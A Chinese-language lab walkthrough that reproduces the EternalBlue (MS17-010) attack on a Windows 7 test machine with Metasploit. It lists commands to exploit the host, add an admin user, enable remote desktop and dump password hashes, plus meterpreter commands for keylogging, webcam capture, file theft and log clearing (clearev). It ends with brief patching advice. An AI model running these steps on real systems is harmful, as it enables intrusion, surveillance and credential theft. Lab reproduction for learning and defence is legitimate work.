一、永恒之藍(lán)的介紹

永恒之藍(lán)是指2017年4月14日晚，黑客團(tuán)體Shadow Brokers（影子經(jīng)紀(jì)人）公布一大批網(wǎng)絡(luò)攻擊工具，其中包含“永恒之藍(lán)”工具，“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日，不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒，英國(guó)、俄羅斯、整個(gè)歐洲以及中國(guó)國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招，被勒索支付高額贖金才能解密恢復(fù)文件。

二、漏洞描述

惡意代碼會(huì)掃描開放445文件共享端口的Windows機(jī)器，無需用戶任何操作，只要開機(jī)上網(wǎng)，不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。

本次黑客使用的是Petya勒索病毒的變種Petwarp，攻擊時(shí)仍然使用了永恒之藍(lán)勒索漏洞，并會(huì)獲取系統(tǒng)用戶名與密碼進(jìn)行內(nèi)網(wǎng)傳播。

本次爆發(fā)使用了已知OFFICE漏洞、永恒之藍(lán)SMB漏洞、局域網(wǎng)感染等網(wǎng)絡(luò)自我復(fù)制技術(shù)，使得病毒可以在短時(shí)間內(nèi)呈爆發(fā)態(tài)勢(shì)。同時(shí)，該病毒與普通勒索病毒不同，其不會(huì)對(duì)電腦中的每個(gè)文件都進(jìn)行加密，而是通過加密硬盤驅(qū)動(dòng)器主文件表(MFT)，使主引導(dǎo)記錄(MBR)不可操作，通過占用物理磁盤上的文件名，大小和位置的信息來限制對(duì)完整系統(tǒng)的訪問，從而讓電腦無法啟動(dòng)，相較普通勒索病毒對(duì)系統(tǒng)更具破壞性。

三、MSF介紹

Metasploit Framework(MSF)是一款開源安全漏洞檢測(cè)工具，附帶數(shù)千個(gè)已知的軟件漏洞，并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測(cè)、漏洞利用等滲透測(cè)試的全流程，被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的，但是再后來的新版中，改成了用Ruby語言編寫的了，此工具在kali中是自帶的。

四、漏洞復(fù)現(xiàn)

1. 復(fù)現(xiàn)環(huán)境

win7（192.168.8.146）（實(shí)驗(yàn)前將防火墻徹底關(guān)閉）

win10（192.168.8.8）后續(xù)攻擊使用

kali（192.168.8.145）

2. 先使用nmap對(duì)目標(biāo)機(jī)進(jìn)行掃描，查看其445端口是否開啟

3. 在終端輸入msfconsole進(jìn)入MSF

4. 使用msf中的查找命令搜索關(guān)于永恒之藍(lán)的腳本：search ms17—010

其中：auxiliary為輔助模塊腳本；exploit為攻擊模塊腳本。

5. 使用ms17-010輔助模塊

• 使用模塊 use 粘貼模塊

6. 配置ms17-010的輔助性腳本

• 查看配置：show options

7. 配置目標(biāo)機(jī)IP地址：set RHOST +目標(biāo)機(jī)ip

8. 配置成功后，執(zhí)行ms17-010的輔助性腳本run #運(yùn)行模塊

9. 使用ms17-010攻擊模塊

• 使用模塊 use 粘貼模塊

10. 查看配置項(xiàng)

• 查看配置：show options

11. 設(shè)置被攻擊機(jī)的ip地址：set RHOST +目標(biāo)機(jī)ip

12. 運(yùn)行ms17-010攻擊模塊

13. 成功建立會(huì)話后，使用一些功能shell

• 在此處可對(duì)目標(biāo)機(jī)使用dos命令進(jìn)行操作

• 使用exit可退出win7終端

14. 入侵成功后

• 開啟遠(yuǎn)程終端：需要雙終端操作

在shell中，新建一個(gè)用戶,將其加入管理員組

• 在meterpreter下使用run getgui -e，試目標(biāo)機(jī)打開允許被遠(yuǎn)程連接

• 用win10進(jìn)行遠(yuǎn)控

• 在meterpreter下進(jìn)行進(jìn)一步實(shí)驗(yàn)

• 查看靶機(jī)相關(guān)進(jìn)程信息：ps

• 查看靶機(jī)相關(guān)信息：sysinfo

• 截圖：screenshot

• 獲取靶機(jī)hash,破解密碼：hashdump

輸入hashdump

尋找一個(gè)在線MD5解密網(wǎng)站進(jìn)行解密

• 還有很多其他的操作這里就不一一演示了

run scraper #查看目標(biāo)主機(jī)詳細(xì)信息

load kiwi ???#加載

pwd ?? #查看目標(biāo)當(dāng)前目錄(windows)

getlwd ? #查看目標(biāo)當(dāng)前目錄(Linux)

search -f *.jsp -d e:\ ?????? #搜索E盤中所有以.jsp為后綴的文件

download e:\test.txt /root #將目標(biāo)機(jī)的e:\test.txt文件下載到/root目錄下

upload /root/test.txt d:\test ? #將/root/test.txt上傳到目標(biāo)機(jī)的 d:\test\ 目錄下

getpid ???#查看當(dāng)前Meterpreter Shell的進(jìn)程

idletime ?#查看主機(jī)運(yùn)行時(shí)間

getuid ?? #查看獲取的當(dāng)前權(quán)限

screenshot #截圖

webcam_list #查看目標(biāo)主機(jī)的攝像頭

webcam_snap #拍照

webcam_stream ?????????????? #開視頻

execute 參數(shù) -f 可執(zhí)行文件 #執(zhí)行可執(zhí)行程序

run getgui -e ?????????#開啟遠(yuǎn)程桌面

keyscan_start ?????????#開啟鍵盤記錄功能

keyscan_dump ?????? #顯示捕捉到的鍵盤記錄信息

keyscan_stop ????????#停止鍵盤記錄功能

uictl disable keyboard ????#禁止目標(biāo)使用鍵盤

uictl enable keyboard ????#允許目標(biāo)使用鍵盤

uictl disable mouse ????? #禁止目標(biāo)使用鼠標(biāo)

uictl enable mouse ????#允許目標(biāo)使用鼠標(biāo)

clearev ???????????#清除日志

• 修復(fù)方法

1.關(guān)閉bios服務(wù)，或開啟防火墻，屏蔽服務(wù)端口

2.給系統(tǒng)打上永恒之藍(lán)的漏洞修復(fù)補(bǔ)丁文章來源地址http://www.zghlxwxcb.cn/news/detail-498923.html